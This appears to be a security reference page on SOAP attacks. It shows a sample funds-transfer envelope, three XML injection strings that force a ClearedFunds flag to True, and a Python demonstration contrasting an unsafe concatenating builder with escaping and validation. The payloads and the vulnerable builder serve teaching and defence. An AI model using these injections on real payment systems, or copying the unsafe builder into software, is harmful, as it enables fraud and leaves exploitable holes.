SOAP

Example SOAP:

<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope">
	<soap:Body>
		<pre:Add xmlns:pre="http://target/lists" soap:encodingStyle=
		"http://www.w3.org/2001/12/soap-encoding">
			<Account>
				<FromAccount>18281008</FromAccount>
				<Amount>1430</Amount>
				<ClearedFunds>False</ClearedFunds>
				<ToAccount>08447656</ToAccount>
			</Account>
		</pre:Add>
	</soap:Body>
</soap:Envelope>

Example Injections:

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430&ToAccount=08447656&Submit=Submit
FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount><!--&ToAccount=-->08447656&Submit=Submit
FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount>08447656</ToAccount></Account></pre:Add></soap:Body></soap:Envelope><!--&Submit=Submit
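
The first injection string above, run through a request builder that concatenates form parameters into the envelope and then through one that escapes them. This is an added example, not code from the original page: build_unsafe, build_escaped, validate and account_view are hypothetical names, and the back end is assumed to read the first matching child of <Account>.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Envelope layout and namespace URIs follow the example on this page
# (the soap:encodingStyle attribute is left out for brevity).
TEMPLATE = (
    '<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope">'
    '<soap:Body><pre:Add xmlns:pre="http://target/lists">'
    '<Account>'
    '<FromAccount>{FromAccount}</FromAccount>'
    '<Amount>{Amount}</Amount>'
    '<ClearedFunds>False</ClearedFunds>'
    '<ToAccount>{ToAccount}</ToAccount>'
    '</Account></pre:Add></soap:Body></soap:Envelope>'
)
FIELDS = ("FromAccount", "Amount", "ToAccount")

def build_unsafe(params):
    """Vulnerable: raw parameter values are pasted into the XML text."""
    return TEMPLATE.format(**{f: params[f] for f in FIELDS})

def build_escaped(params):
    """Hardened: metacharacters are escaped, so values stay text nodes."""
    return TEMPLATE.format(**{f: escape(params[f]) for f in FIELDS})

def validate(params):
    """Stricter still: reject anything that is not a short digit string."""
    for f in FIELDS:
        if not re.fullmatch(r"[0-9]{1,12}", params[f]):
            raise ValueError(f"rejected {f}: unexpected characters")
    return params

def account_view(envelope):
    """Assumed back end: reads the FIRST matching child of <Account>."""
    account = ET.fromstring(envelope).find(".//Account")
    return {tag: account.find(tag).text for tag in ("Amount", "ClearedFunds")}

# First injection string from the page, split into its form parameters.
PAGE_PARAMS = {
    "FromAccount": "18281008",
    "Amount": "1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430",
    "ToAccount": "08447656",
}

if __name__ == "__main__":
    print("unsafe :", account_view(build_unsafe(PAGE_PARAMS)))
    print("escaped:", account_view(build_escaped(PAGE_PARAMS)))
```

With the unsafe builder the injected <ClearedFunds> element precedes the server-set one and wins; with escaping the whole value stays inside <Amount> as text, and validate refuses it before any XML is built.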

Signature Wrapping

DoS

Redirect Reference

WS-Addressing spoofing